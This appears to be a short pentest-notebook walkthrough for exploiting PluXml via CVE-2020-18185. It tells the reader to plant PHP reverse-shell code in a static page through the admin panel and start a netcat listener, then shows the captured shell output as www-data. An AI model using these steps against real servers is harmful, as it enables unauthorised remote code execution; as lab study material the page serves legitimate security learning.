PluXml

Exploiting PluXml

CVE-2020-18185

Log into admin panel [URL]/core/admin

Navigate to static page, modify a page and add PHP rev shell code

Start a listener on the the attacker machine

sudo nc -lvnp 80

Save the page modifications and view the modifed page to get a shell

┌──(pikey㉿kali)-[~]
└─$ sudo nc -lvnp 80
[sudo] password for pikey: 
listening on [any] 80 ...
connect to [192.168.45.188] from (UNKNOWN) [192.168.238.28] 54104
Linux plum 5.10.0-23-amd64 #1 SMP Debian 5.10.179-1 (2023-05-12) x86_64 GNU/Linux
 16:01:20 up 14 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sh: 0: can't access tty; job control turned off
$ whoami
www-data

PreviousNodeBB NextSubrion

Last updated 2 years ago

hashtagCVE-2020-18185

CVE-2020-18185